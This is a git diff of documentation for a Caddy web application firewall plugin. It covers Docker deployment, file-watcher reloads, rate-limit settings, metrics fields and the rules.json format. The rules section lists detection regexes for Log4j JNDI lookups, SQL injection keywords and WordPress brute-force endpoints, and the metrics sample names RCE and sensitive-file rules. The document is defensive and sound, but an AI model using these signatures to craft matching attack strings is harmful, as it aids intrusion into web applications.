+ +Here's the complete Dockerfile shipped with the project, along with inline comments: + +```dockerfile +# --- Stage 1: Builder Stage --- +# Use a Go base image to build the Caddy binary and the WAF module +FROM golang:1.22.3-alpine AS builder + +# Install essential tools for building: git, wget +# - git: required for cloning the repository +# - wget: required for downloading files +# - &&: combines commands +# - no-cache: prevents the apk installer from using the cache (smaller image) +RUN apk add --no-cache git wget + +# Install xcaddy for building custom Caddy binaries with modules. +# - @latest will install the latest available version. +RUN go install github.com/caddyserver/xcaddy/cmd/xcaddy@latest + +# Set the working directory for the build process +WORKDIR /app + +# Clone the caddy-waf repository from GitHub +RUN git clone https://github.com/fabriziosalmi/caddy-waf.git + +# Change to the cloned directory +WORKDIR /app/caddy-waf + +# Fetch and install the necessary Go dependencies, including Caddy and its modules and the caddy-waf plugin. +# - go get will fetch and install all required modules +# - go.mod will be used to properly build the project. +RUN go get -v github.com/caddyserver/caddy/v2 github.com/caddyserver/caddy/v2/caddyconfig/caddyfile github.com/caddyserver/caddy/v2/caddyconfig/httpcaddyfile github.com/caddyserver/caddy/v2 github.com/caddyserver/caddy/v2/modules/caddyhttp github.com/oschwald/maxminddb-golang github.com/fsnotify/fsnotify github.com/fabriziosalmi/caddy-waf + +# Clean up and update the go.mod file +# - go mod tidy will tidy up go.mod file, removing unused dependencies +RUN go mod tidy + +# Download the GeoLite2 Country database from a known location. +# - Use a reliable download location for this file. +RUN wget https://git.io/GeoLite2-Country.mmdb -O GeoLite2-Country.mmdb + +# Clean up previous build artifacts, to ensure a clean build +RUN rm -rf buildenv_* + +# Build the Caddy binary using xcaddy with the caddy-waf module. 
+# - This creates the custom caddy binary with the waf +RUN xcaddy build --with github.com/fabriziosalmi/caddy-waf=./ + +# --- Stage 2: Runtime Stage --- +# Use a minimal base image for the final container. +FROM alpine:latest + +# Set the working directory for the running container. +WORKDIR /app + +# Copy the Caddy binary from the builder stage. +# - This copies the executable from the builder stage +COPY --from=builder /app/caddy-waf/caddy /usr/bin/caddy + +# Copy the GeoLite2 database, rules, and blacklists from the builder stage, and the Caddyfile from the build context. +# - This copies the files into the /app directory in the final image. +COPY --from=builder /app/caddy-waf/GeoLite2-Country.mmdb /app/ +COPY --from=builder /app/caddy-waf/rules.json /app/ +COPY --from=builder /app/caddy-waf/ip_blacklist.txt /app/ +COPY --from=builder /app/caddy-waf/dns_blacklist.txt /app/ +COPY Caddyfile /app/ + +# Create a 'caddy' group and user, with limited privileges to improve security. +# - -S: Creates a system group and user +RUN addgroup -S caddy && adduser -S -G caddy caddy + +# Change ownership of /app to the 'caddy' user and group to ensure proper permissions are set +RUN chown -R caddy:caddy /app + +# Set the user to 'caddy' for running the container and the application. +# - all commands after this command will run with this user. +USER caddy + +# Expose the HTTP port that Caddy will listen on. +# - this does not expose the port on the host, for that use the `docker run -p` command. +EXPOSE 8080 + +# Set the command to run when the container starts. +# - `caddy run`: starts the caddy server +# - `--config /app/Caddyfile`: specifies the location of the Caddy configuration file. 
+CMD ["caddy", "run", "--config", "/app/Caddyfile"] +``` + +## Running the Docker Container -# Run the Docker container, mapping port 8080 +Once the Docker image is built, you can run a container using the following command: + +```bash docker run -p 8080:8080 caddy-waf ``` +* **`docker run`**: This is the Docker command to create and run a container from a specified image. +* **`-p 8080:8080`**: The `-p` flag maps port `8080` on the host machine to port `8080` inside the container. This makes the WAF accessible via port `8080` on your host. You can adjust this mapping as needed. For example, `-p 80:8080` will map port `80` on the host to port `8080` in the container, and `-p 8081:8080` will map port `8081` on the host to port `8080` in the container. +* **`caddy-waf`**: Specifies the name of the Docker image to run, which we built in the previous step. + +**Run Command Options:** + +* **Port Mapping:** Adjust the `-p` flag to map the correct host port to the port exposed by the container if your WAF is using a port other than `8080`. +* **Environment Variables:** Use the `-e` flag to pass environment variables to the container (e.g., `-e LOG_LEVEL=DEBUG`, `-e ANOMALY_THRESHOLD=30`). For example: `docker run -p 8080:8080 -e LOG_LEVEL=DEBUG caddy-waf`. +* **Volume Mounts:** Use the `-v` flag to mount volumes for persistent configuration or data, ensuring that changes to configuration are not lost if the container is stopped or removed. For example, `-v /my/config:/etc/caddy` mounts the host's directory `/my/config` to `/etc/caddy` inside the container. This is particularly important for logs. For example: `docker run -p 8080:8080 -v /my/config:/etc/caddy -v /my/logs:/var/log/caddy caddy-waf`. +* **Detached Mode:** Use the `-d` flag to run the container in the background: `docker run -d -p 8080:8080 caddy-waf`. +* **Container Name**: Use `--name` to specify a name for the container for easy management: `docker run --name my-waf -d -p 8080:8080 caddy-waf`. 
+ +## Docker Compose + +For more complex deployments, use Docker Compose to configure multiple containers and their dependencies using a `docker-compose.yml` file. An example `docker-compose.yml` file is: + +```yaml +version: "3.9" +services: + waf: + image: caddy-waf + ports: + - "8080:8080" + volumes: + - ./config:/etc/caddy/ + - ./logs:/var/log/caddy/ + environment: + - LOG_LEVEL=DEBUG +``` + +To start the container using docker compose, execute `docker-compose up -d` from the directory containing the `docker-compose.yml` file. + +## Best Practices: + +* **Immutable Containers:** Treat containers as immutable units. Any changes should be done by rebuilding the image rather than modifying it inside the running container. +* **Configuration Outside the Image:** Store the WAF's configuration (e.g., `Caddyfile`, `rules.json`, blacklists) outside the container image using volume mounts. This allows for configuration updates without rebuilding the container image. +* **Persistent Logging:** Configure logging to persist logs outside the container, making them accessible to log management and analysis tools by mounting a volume to the directory where logs are written. +* **Security:** Follow Docker security best practices, such as running containers with non-root users, using a minimal base image, and keeping the container image up to date, using a specific version rather than `latest`. +* **Resource Management**: Set appropriate resource limits (CPU, memory) to ensure stable and predictable performance and prevent one container from consuming too many resources. +* **Health Checks:** Add a health check to the Dockerfile so Docker knows if the container is running correctly and automatically restarts if it fails. +* **Image Tagging:** Tag images with meaningful tags, like version numbers or build identifiers, to facilitate tracking and versioning. 
+* **Environment variables:** Pass sensitive information (e.g., API keys) as environment variables, rather than hardcoding them in the image. + +## Example Usage Scenarios: + +**Example with Volume Mounts:** + +```bash +docker run -p 8080:8080 -v /my/config:/etc/caddy -v /my/logs:/var/log/caddy caddy-waf +``` + +* `/my/config` on the host is mounted to `/etc/caddy` inside the container, providing external configuration files to the container. +* `/my/logs` is mounted to `/var/log/caddy`, persisting log data outside the container. + +**Example with Environment Variables:** + +```bash +docker run -p 8080:8080 -e LOG_LEVEL=DEBUG caddy-waf +``` + +* The `LOG_LEVEL` environment variable is passed to the container, which then controls the log output within the application. + +**Example using docker compose:** + +```bash +docker-compose up -d +``` + +* Starts the container using the provided `docker-compose.yml` file in detached mode. + +## Summary + +Leveraging Docker for the WAF provides a robust, scalable, and easily manageable deployment solution. By following these guidelines and best practices, you can create a production-ready containerized environment for your WAF, maximizing its efficiency and security. This extended guide will help you understand and implement the Docker support for the WAF effectively. diff --git a/docs/dynamicupdates.md b/docs/dynamicupdates.md index 7adc4b9..2d32a0b 100644 --- a/docs/dynamicupdates.md +++ b/docs/dynamicupdates.md @@ -1,7 +1,49 @@ # 🔄 Dynamic Updates -* Most changes to the configuration (rules, blacklists, etc) can be applied without restarting Caddy. -* File watchers monitor the changes on your rules and blacklist files and trigger the automatic reload. -* Simply modify the related files and the changes will be applied automatically by the file watcher. -* To reload configurations using the Caddy API execute `caddy reload`. 
+The WAF is designed to be highly flexible and allows for dynamic updates to its configuration without requiring a full restart of the Caddy server. This functionality ensures that security policies can be modified and applied rapidly in response to new threats or changing business needs, while minimizing disruption to the application. +Here's a comprehensive breakdown of how dynamic updates work: + +## Automatic Reloading via File Watchers + +* **File Monitoring:** The WAF incorporates file watchers that monitor changes on specific files, including: + * The rule file (`rules.json`) + * The IP blacklist file (`ip_blacklist.txt`) + * The DNS blacklist file (`dns_blacklist.txt`) + * The GeoIP database file (`GeoLite2-Country.mmdb`) + * The Caddyfile configuration file (if `Caddyfile` changes need to be applied) + +* **Change Detection:** When a change is detected in any of these monitored files (e.g., a file is modified, added, or deleted), the file watcher automatically triggers a reload of the WAF configuration, applying those changes. +* **Automatic Reload:** This reload process parses the modified file, updates the WAF's internal state, and applies the new settings, without needing a full restart of the server. +* **Minimal Disruption:** The automatic reload process is designed to be efficient, ensuring that changes are applied quickly with minimal disruption to ongoing requests. There will be a small period in which the rules are being reloaded. +* **Real-Time Updates:** Changes made to the files can be applied almost in real time allowing for quick responses to new vulnerabilities and attack patterns. + +## Configuration Reload via Caddy API + +In addition to file watchers, the WAF can also be dynamically reloaded using the Caddy API. This can be useful for automation or in scenarios where changes might not be reflected directly on the file system. 
+ +* **Caddy API Endpoint:** The Caddy admin API exposes a `/load` endpoint, which accepts a new configuration and applies it, triggering a configuration reload. +* **API Call:** To reload the configuration, an HTTP POST request is sent to the Caddy admin API endpoint, typically available at `localhost:2019/load` (the admin address can be changed with the `admin` global option in your `Caddyfile`). +* **Command:** The easiest way to use this API is the `caddy reload` command, which performs this HTTP POST request for you. +* **Manual Reload:** This process is useful when Caddy configuration changes must be applied programmatically or when file watchers may not be suitable. +* **Automation:** You can integrate this API call into your configuration management systems, enabling automated deployments and updates of the WAF configuration. + +## Practical Usage + +* **Rule Modifications:** To add a new WAF rule, modify the `rules.json` file. The file watcher will automatically detect the change, and the new rule will be loaded into the WAF. +* **Blacklist Updates:** To block new IP addresses or domains, add the entries to the appropriate files (`ip_blacklist.txt` or `dns_blacklist.txt`). The changes will be applied automatically. +* **GeoIP Database Updates:** If you need to update the GeoIP database, replace the `GeoLite2-Country.mmdb` file. +* **Caddyfile Changes:** If you change the `Caddyfile` configuration file, run `caddy reload` to apply the changes. + +## Considerations and Best Practices + +* **File Format Validation:** The WAF includes validation mechanisms to ensure that the changes applied to the files are correctly formatted and don't cause errors when reloading. +* **Error Handling:** In the event of an error during the file parsing, the WAF will gracefully handle the situation and report the error in logs, avoiding service disruption. +* **Atomic Updates:** When making multiple changes across different files, ensure that changes are made atomically (e.g. 
by writing to a temporary file and then renaming it over the original file), to prevent the WAF from reloading partial or incomplete configurations. +* **Testing:** After applying configuration changes, you should always test the system to make sure that the rules are working correctly and there are no unexpected consequences. +* **Permissions:** Verify that the process running the file watcher has permission to read the files you want it to monitor. +* **Rate Limiting:** Be aware that while the WAF rules and blacklists can be reloaded without a full restart, the rate limiting configuration lives in the `Caddyfile`, so it is reloaded only when you modify the `Caddyfile` and run `caddy reload`. + +## Summary + +The dynamic updates feature of the WAF is a critical component for flexibility and ease of management. By utilizing file watchers and the Caddy API, security policies can be rapidly updated without disruption, ensuring that the WAF can adapt to the evolving threat landscape and provide continuous protection for web applications. Understanding how these dynamic update mechanisms work and their limitations is essential for effectively managing the WAF. diff --git a/docs/geoblocking.md b/docs/geoblocking.md index f86c67f..a880b44 100644 --- a/docs/geoblocking.md +++ b/docs/geoblocking.md @@ -11,10 +11,3 @@ block_countries /path/to/GeoLite2-Country.mmdb RU CN KP # Whitelist requests from the United States whitelist_countries /path/to/GeoLite2-Country.mmdb US ``` - -* **Note:** Only one of `block_countries` or `whitelist_countries` can be enabled at a time. - -## GeoIP Lookup Fallback - -When GeoIP lookup fails, the fallback behavior is configurable using the `WithGeoIPLookupFallbackBehavior` option when instantiating the middleware. Default behavior is to log and treat the lookup as not in the list. Options are `none` to block if the lookup fails or a specific country code to fallback to. 
For example, setting it to `US` will allow requests from IPs if the GeoIP lookup fails and `US` was in the list of allowed countries. - diff --git a/docs/metrics.md b/docs/metrics.md index f6dd43a..4aba055 100644 --- a/docs/metrics.md +++ b/docs/metrics.md @@ -1,53 +1,118 @@ - # Rules Metrics - - You can gain insights into your WAF's behavior, optimize your ruleset, and monitor your traffic by inspecting the metrics endpoint or processing such stats with other tools. This endpoint provides detailed information about requests, rule hits, and GeoIP statistics. - - ```json - { - "allowed_requests": 1209, - "blocked_requests": 6275, - "geoip_stats": {}, - "rule_hits": { - "942440": 52, - "allow-legit-browsers": 79, - "block-scanners": 390, - "crlf-injection-headers": 8, - "header-attacks": 13, - "header-attacks-consolidated": 279, - "header-suspicious-x-forwarded-for": 39, - "idor-attacks": 401, - "insecure-deserialization-java": 13, - "jwt-tampering": 117, - "nosql-injection-attacks": 65, - "open-redirect-attempt": 179, - "path-traversal": 361, - "rce-command-injection-args": 13, - "rce-command-injection-body": 572, - "rce-commands": 234, - "rce-commands-expanded": 169, - "sensitive-files": 59, - "sensitive-files-expanded": 24, - "sql-injection": 104, - "sql-injection-comment-bypass-args": 416, - "sql-injection-improved-basic": 715, - "ssti-attacks": 65, - "unusual-paths": 373, - "xml-injection-attacks": 115, - "xss": 156, - "xss-attacks": 407, - "xss-improved-encoding": 1638 - }, - "rule_hits_by_phase": { - "1": 1297, - "2": 5759 - }, - "total_requests": 7484 - } - ``` - - * `allowed_requests`: Total number of requests that were allowed by the WAF. - * `blocked_requests`: Total number of requests that were blocked by the WAF. - * `geoip_stats`: Statistics about GeoIP lookups (if enabled). - * `rule_hits`: An object showing how many times each rule has matched a request. The keys represent the rule IDs, and the values represent the number of matches. 
- * `rule_hits_by_phase`: An object showing how many hits were recorded for each phase of request processing. The keys are the numeric phase identifiers, and values show the number of hits within each phase. - * `total_requests`: The total number of requests processed by the WAF. +# Metrics + +The WAF's metrics endpoint provides critical insights into its operational behavior, allowing you to analyze traffic patterns, fine-tune rule sets, and monitor performance. This data is essential for maintaining security posture and optimizing resource allocation. The metrics are available in JSON format, making them easily consumable by monitoring tools and analysis pipelines. + +Here's a comprehensive breakdown of the metrics provided: + +```json +{ + "allowed_requests": 1209, + "blocked_requests": 6275, + "geoip_stats": {}, + "rule_hits": { + "942440": 52, + "allow-legit-browsers": 79, + "block-scanners": 390, + "crlf-injection-headers": 8, + "header-attacks": 13, + "header-attacks-consolidated": 279, + "header-suspicious-x-forwarded-for": 39, + "idor-attacks": 401, + "insecure-deserialization-java": 13, + "jwt-tampering": 117, + "nosql-injection-attacks": 65, + "open-redirect-attempt": 179, + "path-traversal": 361, + "rce-command-injection-args": 13, + "rce-command-injection-body": 572, + "rce-commands": 234, + "rce-commands-expanded": 169, + "sensitive-files": 59, + "sensitive-files-expanded": 24, + "sql-injection": 104, + "sql-injection-comment-bypass-args": 416, + "sql-injection-improved-basic": 715, + "ssti-attacks": 65, + "unusual-paths": 373, + "xml-injection-attacks": 115, + "xss": 156, + "xss-attacks": 407, + "xss-improved-encoding": 1638 + }, + "rule_hits_by_phase": { + "1": 1297, + "2": 5759 + }, + "total_requests": 7484 +} +``` + +### Key Metrics: + +* **`allowed_requests` (Integer):** + * Represents the total count of HTTP requests that passed through all WAF checks without triggering any blocking rules. 
+ * A high number of allowed requests generally indicates normal traffic flow. However, consistently high values could suggest that your WAF ruleset might need tuning to catch more sophisticated threats, or alternatively, that there is a low level of attack traffic at present. + * This metric can be crucial in determining how much normal traffic your system is handling. +* **`blocked_requests` (Integer):** + * Indicates the total number of HTTP requests that were blocked by the WAF because they matched at least one blocking rule. + * A high number of blocked requests indicates the presence of malicious activity targeting the system. + * Monitoring this metric in conjunction with rule hit counts can help identify specific attack vectors and sources. + * Spikes in this number can be an indicator of an attack in progress and should be examined immediately. +* **`geoip_stats` (Object):** + * Provides statistics about GeoIP lookups performed during request processing. This object will vary in its structure and content depending on the specific GeoIP implementation and the type of information the system collects. + * If no GeoIP lookups are enabled or no data is collected it would appear empty (`{}`). + * If enabled, this object might include the number of lookups, counts by country, specific countries that triggered blocking/whitelisting rules, or any other related insights. Example: + + ```json + "geoip_stats": { + "total_lookups": 10000, + "blocked_by_country": { + "RU": 200, + "CN": 150 + }, + "allowed_by_country":{ + "US": 5000 + } + } + ``` + * This metric is essential to understand geographical attack patterns and the effectiveness of country-based blocking/whitelisting. + * High numbers of lookups can indicate a lot of traffic originating from various regions. + +* **`rule_hits` (Object):** + * A core component of the metrics, this object provides a detailed breakdown of how many times each specific rule was triggered by incoming requests. 
+ * The keys within this object represent unique rule identifiers (often the rule's ID or a user-defined name). + * The values associated with each key represent the number of times that particular rule was matched. + * This metric is invaluable for identifying which rules are being triggered most often, potentially indicating common attack vectors or incorrectly configured rules. + * High hit counts for specific rules indicate that they might be addressing a widespread issue or might be too sensitive and require refinement. + * Low hit counts on critical rules suggest those rules are either not performing correctly or that the particular attack is not present. + * Careful review of this information can help fine-tune the WAF ruleset, focusing on effective rules and removing unnecessary or incorrectly triggered rules. + * It is important to note that a low number of hits on a rule does not necessarily mean the rule is unnecessary; the rule may be designed to block rare, high-severity attacks that are not seen regularly. +* **`rule_hits_by_phase` (Object):** + * Provides insights into how many rules were hit at each processing phase. + * Keys are numeric phase identifiers. The specific meaning of each phase depends on the WAF architecture, but generally: + * Phase 1: Typically, pre-processing or request parsing. + * Phase 2: Usually, request analysis and rule evaluation. + * The values indicate the number of rule hits recorded in the phase. + * Helps to understand which part of the pipeline is doing most of the work, which helps determine if there is a performance issue with the pre or post processing of requests. +* **`total_requests` (Integer):** + * Represents the total number of requests that were received and processed by the WAF, regardless of whether they were allowed or blocked. + * This metric serves as a baseline for overall traffic volume. 
+ * It can be used in conjunction with `allowed_requests` and `blocked_requests` to calculate percentages of allowed/blocked traffic and identify potential anomalies. + * Sudden changes in `total_requests` might indicate a change in traffic volume or an ongoing attack. + +### Analysis and Usage: + +* **Performance Monitoring:** Observe metrics over time to identify performance bottlenecks, high resource utilization, and potential areas for optimization. +* **Security Analysis:** Identify common attack vectors by analyzing the `rule_hits` metric and the type of blocked requests. This can also show potential gaps in the security setup. +* **Ruleset Optimization:** Refine and adjust rules based on real-world traffic patterns. Disable rules that trigger false positives or rules that are not used. +* **Alerting:** Set up alerts based on metrics thresholds. For example, get alerts when `blocked_requests` are above a certain level or a specific rule has excessive hits. +* **Capacity Planning:** Track trends to help with predicting future resource needs. +* **Compliance Auditing:** Metrics can provide data needed to satisfy security and compliance audits. +* **Dashboarding:** Visualizing metrics in a dashboard helps with daily monitoring and quick problem identification. + +### Important Considerations: + +* **Context is important:** These metrics should always be interpreted in context to fully understand them. +* **Custom Metrics:** Depending on implementation, it may be possible to add custom metrics to enhance the default ones. + +By carefully analyzing the data provided by the metrics endpoint, you gain critical insights into the effectiveness of your WAF and can make data-driven decisions to protect your applications. This information is essential for ensuring robust security and optimal performance. 
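The percentage and rule-ranking analysis described above can be sketched in a few lines of Python. This is a minimal illustration and not part of the WAF: the helper name `summarize_metrics` and its `top_n` parameter are hypothetical, the sample values are a trimmed copy of the example payload shown earlier, and retrieving the JSON from the metrics endpoint is left out because it depends on your deployment.

```python
import json


def summarize_metrics(metrics: dict, top_n: int = 3) -> dict:
    """Derive allowed/blocked percentages and the most-hit rules from a metrics payload."""
    total = metrics.get("total_requests", 0)
    allowed = metrics.get("allowed_requests", 0)
    blocked = metrics.get("blocked_requests", 0)

    def pct(part: int) -> float:
        # Guard against division by zero when no requests have been processed yet.
        return round(100.0 * part / total, 2) if total else 0.0

    # Rank rules by hit count, highest first, and keep the top_n entries.
    rule_hits = metrics.get("rule_hits", {})
    top_rules = sorted(rule_hits.items(), key=lambda item: item[1], reverse=True)[:top_n]

    return {
        "total_requests": total,
        "allowed_pct": pct(allowed),
        "blocked_pct": pct(blocked),
        "top_rules": top_rules,
    }


# Trimmed copy of the example payload (assumed to be already fetched and decoded).
sample = json.loads("""
{
  "allowed_requests": 1209,
  "blocked_requests": 6275,
  "rule_hits": {
    "block-scanners": 390,
    "rce-command-injection-body": 572,
    "sql-injection-improved-basic": 715,
    "xss-improved-encoding": 1638
  },
  "total_requests": 7484
}
""")

summary = summarize_metrics(sample)
print(summary)
```

A monitoring job could compare `blocked_pct` against an alert threshold of your choosing, or watch `top_rules` for a rule that suddenly dominates the ranking.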
diff --git a/docs/ratelimit.md b/docs/ratelimit.md index 1175ec1..14fc168 100644 --- a/docs/ratelimit.md +++ b/docs/ratelimit.md @@ -1,6 +1,8 @@ # ⏱️ Rate Limiting -Configure rate limits using requests count, time window, optional cleanup interval and specific paths. You can use exact paths or regex patterns for greater flexibility. You can specify to which path to apply rate limiting using the parameter `match_all_paths`, if true only matching paths will be rate limited, otherwise all paths except the matching will be rate limited: +Rate limiting is a crucial mechanism for protecting web applications from abuse, denial-of-service attacks, and brute-force login attempts. It works by restricting the number of requests a client can make within a given time period. This configuration allows for granular control over traffic flow based on client IP addresses and specific paths. + +The rate limiting functionality is configured within a `rate_limit` block, allowing fine-grained control of its behavior, as shown in the following Caddyfile example: ```caddyfile rate_limit { @@ -12,8 +14,68 @@ rate_limit { } ``` -* The rate limiter is based on the client IP address. -* The cleanup interval controls how frequently the rate limiter clears expired entries from memory. -* When the requests count is greater than the specified value for the defined period, the request will be blocked. -* Use `paths` to specify regex patterns or paths for selective rate limiting. If `match_all_paths` is set to `false`, only the specified paths will be rate-limited. If `match_all_paths` is set to `true`, all paths *except* those specified will be rate-limited. +Here's a comprehensive breakdown of the configuration options: + +### Configuration Options: + +* **`requests` (Integer):** + * Specifies the maximum number of requests allowed from a single client IP address within the defined `window`. 
+ * A lower value makes rate limiting stricter; a higher value is more permissive. + * Choosing an appropriate value requires balancing protection from abusive behavior against legitimate traffic patterns. + * This value must be a positive integer. + * Example: `requests 50`, `requests 100`, `requests 500` + +* **`window` (Time Duration):** + * Defines the time window in which the `requests` limit is enforced. + * It uses standard time units (e.g., seconds, minutes, hours). + * When the number of `requests` from a given client IP exceeds the configured value within the `window`, further requests are blocked. + * Common examples include `1s`, `10s`, `1m`, `5m`, or `1h`. + * The effective limit is `requests` per `window`: 100 requests per `10s` is far more permissive than 100 requests per `1h`, so tune the two values together. + * Example: `window 10s`, `window 1m`, `window 30m` + +* **`cleanup_interval` (Time Duration):** + * Specifies the interval at which the rate limiter clears expired entries from its internal memory. + * Expired entries are client IP addresses whose time `window` has elapsed, so their recorded request counts no longer apply. + * A shorter `cleanup_interval` reduces memory usage by removing expired entries more frequently, but may increase CPU load. A longer `cleanup_interval` may increase the memory footprint but lowers CPU usage. + * Expired entries may also be discarded as they are encountered; `cleanup_interval` adds a periodic, global sweep to make sure they are removed. + * Example: `cleanup_interval 1m`, `cleanup_interval 5m`, `cleanup_interval 15m` + +* **`paths` (Array of Strings):** + * An array of strings representing regular expressions (or exact paths) that determine which URLs should be targeted by this rate limiter. 
+ * Each string is treated as a regular expression pattern, allowing for flexible matching of URLs. + * When this array is not empty, rate limiting will be applied based on the `match_all_paths` configuration. + * For exact paths, specify the exact URL path, such as `"/login"` or `"/api/users"`. + * For more flexible matching, use regex patterns, like `"/api/v1/.*"` (all paths under `/api/v1/`), or `"/product/\d+"` (all paths like `/product/123`). + * Example: `paths /api/v1/.* /admin/.*`, `paths /users /login`, `paths /static/.*` + +* **`match_all_paths` (Boolean):** + * Determines how rate limiting is applied to the specified paths. + * When `false` (or omitted), the rate limiting rules apply *only* to the paths matching the patterns specified in `paths`; all other paths bypass this rate limit configuration. + * When `true`, the rate limiting rules apply to *all* paths, *except* for the paths matching the patterns specified in the `paths` field. + * This option is useful when you need to rate limit most of your traffic and make exceptions for specific paths or endpoints. + * Example: `match_all_paths false`, `match_all_paths true` + +### Rate Limiting Behavior: + +* **IP-Based:** Rate limiting is enforced based on the client IP address. The rate limiter tracks the number of requests per IP, not per user or any other attribute. +* **Blocking:** When the request count from a given IP address exceeds the `requests` limit within the specified `window`, subsequent requests from that IP are blocked with a configurable error code (`429 Too Many Requests` by default). +* **Path Matching:** The `paths` setting and the `match_all_paths` setting together determine which requests will be rate limited by the current `rate_limit` configuration block. 
 If `match_all_paths` is false, only paths that match the patterns provided in `paths` will be rate limited. If it is set to true, every request will be rate limited unless it matches a pattern provided in `paths`. +* **Non-Blocking:** If the request count from an IP does not exceed the limit, the request is allowed to proceed normally. +* **Multiple Rules:** It is possible to configure multiple `rate_limit` blocks, each with a different configuration. The order in which the rate limiters appear is not important. + +### Considerations and Best Practices: + +* **Choosing Limits:** Choose `requests` and `window` values carefully based on your application's normal traffic patterns and requirements. A value that is too low could cause denial of service for legitimate users, whereas a value that is too high might not provide adequate protection. +* **Monitoring:** Continuously monitor the rate limiter's effectiveness and adjust the values as needed. Use logging and metrics to gain insights into how the rate limiter performs. +* **Dynamic Rate Limiting:** For more advanced scenarios, consider implementing dynamic rate limiting, where the limits are adjusted based on real-time traffic conditions and historical patterns. +* **Multiple Rate Limiters:** It's recommended to apply different rate limit rules for various endpoints or resources based on their criticality and anticipated usage patterns. +* **Global vs. Local:** Use rate limiting along with other security methods for better protection. Also consider rate limiting at other levels, such as load balancers and reverse proxies, to provide multi-layered protection. +* **IP Spoofing:** Rate limiting based on IP addresses might be bypassed by sophisticated attackers who spoof IP addresses; take this into consideration when configuring your WAF. 
+* **Log Information:** Each time a request is rate limited, logs should provide relevant information for debugging, such as the client IP and the blocked path. +* **Testing:** Test rate limiting thoroughly to ensure that it does not affect legitimate users and that it is working as intended, particularly when complex path matching is involved. + +### Advanced scenarios + +* **Varying window based on request path:** It might be useful to configure different time windows and request limits based on the path that is being accessed, e.g. stricter limits on authentication endpoints and looser limits on static files. +* **Combining with other security features:** Rate limiting can be combined with other WAF features such as IP blocking, country blocking, and rule-based blocking to provide a holistic approach to security. diff --git a/docs/rules.md b/docs/rules.md index d979328..94d9757 100644 --- a/docs/rules.md +++ b/docs/rules.md @@ -1,52 +1,107 @@ - # 📜 Rules Format (`rules.json`) - - Rules are defined in a JSON file as an array of objects. Each rule specifies how to match a pattern, what parts of the request to inspect, and what action to take when a match is found. - - ```json - [ - { - "id": "wordpress-brute-force", - "phase": 2, - "pattern": "(?i)(?:wp-login\\.php|xmlrpc\\.php).*?(?:username=|pwd=)", - "targets": ["URI", "ARGS"], - "severity": "HIGH", - "action": "block", - "score": 8, - "description": "Block brute force attempts targeting WordPress login and XML-RPC endpoints." - }, - { - "id": "sql-injection-header", - "phase": 1, - "pattern": "(?i)(?:select|insert|update|delete|union|drop|--|;)", - "targets": ["HEADERS:X-Attack"], - "severity": "CRITICAL", - "action": "block", - "score": 10, - "description": "Detect and block SQL injection attempts in custom header." 
- }, - { - "id": "log4j-jndi", - "phase": 2, - "pattern": "(?i)\\$\\{jndi:(ldap|rmi|dns):\\/\\/.*\\}", - "targets": ["BODY","ARGS","URI","HEADERS"], - "severity": "CRITICAL", - "action": "block", - "score": 10, - "description":"Detect Log4j vulnerability attempts" - } - ] - ``` - - ## Rule Fields - - | Field | Description | Example | - |---------------|--------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------| - | `id` | Unique identifier for the rule. | `sql_injection_1` | - | `phase` | Processing phase (1: Request Headers, 2: Request Body, 3: Response Headers, 4: Response Body). | `2` | - | `pattern` | Regular expression to match malicious patterns. Use `(?i)` for case insensitive matching. | `(?i)(?:select|insert|update)` | - | `targets` | Array of request parts to inspect, which can be: `URI`, `ARGS`, `BODY`, `HEADERS`, `COOKIES`, `HEADERS:`, `RESPONSE_HEADERS`, `RESPONSE_BODY`, `RESPONSE_HEADERS:`, or `COOKIES:`.| `["ARGS", "BODY"]` | - | `severity` | Severity of the rule (`CRITICAL`, `HIGH`, `MEDIUM`, `LOW`). Used only for logging and metric reporting. | `CRITICAL` | - | `action` | Action to take on match (`block` or `log`). If empty or invalid, defaults to `block`. | `block` | - | `score` | Anomaly score to add when this rule matches. | `5` | - | `description` | A descriptive text for the rule. | `Detect SQL injection` | - ``` +# 📜 Rules + +The WAF's behavior is governed by a set of rules defined in a JSON file (`rules.json`). These rules specify how to identify and respond to potentially malicious requests. The rules are structured as an array of JSON objects, where each object represents an individual rule. This format allows for flexible and configurable security policies. 
+ +Here's a detailed breakdown of the rules format, including example rules and descriptions of each field: + +```json +[ + { + "id": "wordpress-brute-force", + "phase": 2, + "pattern": "(?i)(?:wp-login\\.php|xmlrpc\\.php).*?(?:username=|pwd=)", + "targets": ["URI", "ARGS"], + "severity": "HIGH", + "action": "block", + "score": 8, + "description": "Block brute force attempts targeting WordPress login and XML-RPC endpoints." + }, + { + "id": "sql-injection-header", + "phase": 1, + "pattern": "(?i)(?:select|insert|update|delete|union|drop|--|;)", + "targets": ["HEADERS:X-Attack"], + "severity": "CRITICAL", + "action": "block", + "score": 10, + "description": "Detect and block SQL injection attempts in custom header." + }, + { + "id": "log4j-jndi", + "phase": 2, + "pattern": "(?i)\\$\\{jndi:(ldap|rmi|dns):\\/\\/.*\\}", + "targets": ["BODY","ARGS","URI","HEADERS"], + "severity": "CRITICAL", + "action": "block", + "score": 10, + "description":"Detect Log4j vulnerability attempts" + }, + { + "id": "low-score-log", + "phase": 2, + "pattern": "(?i)suspicious-keyword", + "targets": ["BODY"], + "severity": "LOW", + "action": "log", + "score": 1, + "description": "Example of a low score log rule" + }, + { + "id": "specific-header-rule", + "phase": 1, + "pattern": "(?i)attack-payload", + "targets": ["HEADERS:User-Agent"], + "severity": "MEDIUM", + "action": "block", + "score": 7, + "description": "Example blocking based on a User-Agent header payload" + }, + { + "id": "cookie-check", + "phase": 1, + "pattern": "(?i)bad_cookie", + "targets": ["COOKIES:sessionid"], + "severity": "HIGH", + "action":"block", + "score": 9, + "description":"Example of a rule that targets cookies" + }, + { + "id": "response-header-check", + "phase": 3, + "pattern": "(?i)sensitive-info", + "targets": ["RESPONSE_HEADERS:X-Server-Version"], + "severity": "MEDIUM", + "action": "log", + "score": 2, + "description": "Example of a response header rule" + } +] +``` + +## Rule Fields: A Detailed Explanation + 
+Each rule object contains the following fields: + +| Field | Description | Example | +|---------------|--------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------| +| **`id`** | **Unique Identifier:** This is a string that uniquely identifies the rule within the `rules.json` file. It is used for logging, metric reporting, and rule management. It should be descriptive and easy to understand. IDs must be unique across all rules. | `sql_injection_1`, `xss-filter-block`, `wordpress-login-attempt` | +| **`phase`** | **Processing Phase:** An integer indicating the phase of request/response processing in which this rule should be applied. The phases are:
* `1`: *Request Headers* (applied *before* request body processing)
* `2`: *Request Body* (applied *after* request headers have been parsed).
* `3`: *Response Headers* (applied *before* response body is sent).
